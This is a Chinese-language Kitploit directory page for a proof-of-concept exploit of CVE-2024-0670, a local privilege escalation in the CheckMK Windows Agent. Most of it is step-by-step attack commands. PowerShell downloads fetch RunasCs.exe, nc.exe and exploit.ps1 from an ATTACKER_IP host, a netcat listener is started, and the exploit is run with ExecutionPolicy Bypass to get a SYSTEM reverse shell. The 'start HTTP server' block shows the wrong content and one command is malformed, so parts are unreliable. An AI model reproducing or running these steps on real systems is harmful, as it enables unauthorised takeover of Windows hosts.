Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit — 此仓库包含针对CVE-2024-0670的漏洞利用演示,该漏洞是影响CheckMK Agent for Windows的本地权限提升漏洞。该漏洞允许低权限用户通过滥用MSI修复机制处理的可写文件路径获取SYSTEM权限。 | Kitploit
工具/GitHubGitHub/elsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit
权限提升Payload生成漏洞分析漏洞利用渗透测试学习与教育二进制利用
GitHubelsevar11/cve-2024-0670-checkmk-agent-local-privilege-escalation-exploit

CVE-2024-0670-CheckMK-Agent-Local-Privilege-Escalation-Exploit

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

此仓库包含针对CVE-2024-0670的漏洞利用演示,该漏洞是影响CheckMK Agent for Windows的本地权限提升漏洞。该漏洞允许低权限用户通过滥用MSI修复机制处理的可写文件路径获取SYSTEM权限。

查看仓库
319个月前尚未审核

CVE-2024-0670 – CheckMK Agent 本地权限提升 (PoC)

本仓库包含 CVE-2024-0670 的一个简洁清晰的验证概念(PoC),该漏洞是 CheckMK Windows Agent 中的一个本地权限提升漏洞。 低权限用户可以通过滥用 MSI 修复过程中执行的可写临时文件路径来获取 SYSTEM 权限。

🔍 漏洞概述

  • 厂商:Tribe29
  • CVE:CVE-2024-0670
  • 公告:https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-writable-files-in-checkmk-agent/

在 MSI 修复期间,CheckMK 会在以下路径执行文件:

root@kitploit:~
  C:\Windows\Temp\

如果普通用户能够将可预测名称的文件放置在该路径下,就能以 NT AUTHORITY\SYSTEM 身份执行命令。

该漏洞利用会植入多个载荷文件名,并触发 MSI 修复以实现 SYSTEM 执行。

📂 文件

root@kitploit:~
RunasCs.exe     → runas 替代工具(支持明文密码)
nc.exe          → Netcat(反向 Shell)
exploit.ps1     → CVE-2024-0670 漏洞利用脚本
README.md       → 文档

🛠 要求

  • 低权限 Windows 用户
  • PowerShell 已启用
  • 已安装 CheckMK Windows Agent
  • 能够下载文件
  • Python(用于简易 HTTP 服务器)
  • 攻击机上的 Netcat 监听器

📡 启动 HTTP 服务器

root@kitploit:~
  C:\Windows\Temp\

📥 在目标上下载工具

root@kitploit:~
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1

🚀 运行漏洞利用

在攻击机上启动监听器:

root@kitploit:~
nc -lvnp 1111
root@kitploit:~
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"

如果成功,你将收到一个 SYSTEM 反向 Shell。

🔧 手动构建 RunasCs(可选)

root@kitploit:~
net4: 
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs 

net2: 
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs

⚖️ 法律免责声明

本项目仅用于教育和授权的渗透测试。 请勿将其用于非法目的。 作者不对滥用行为负责。

下载工具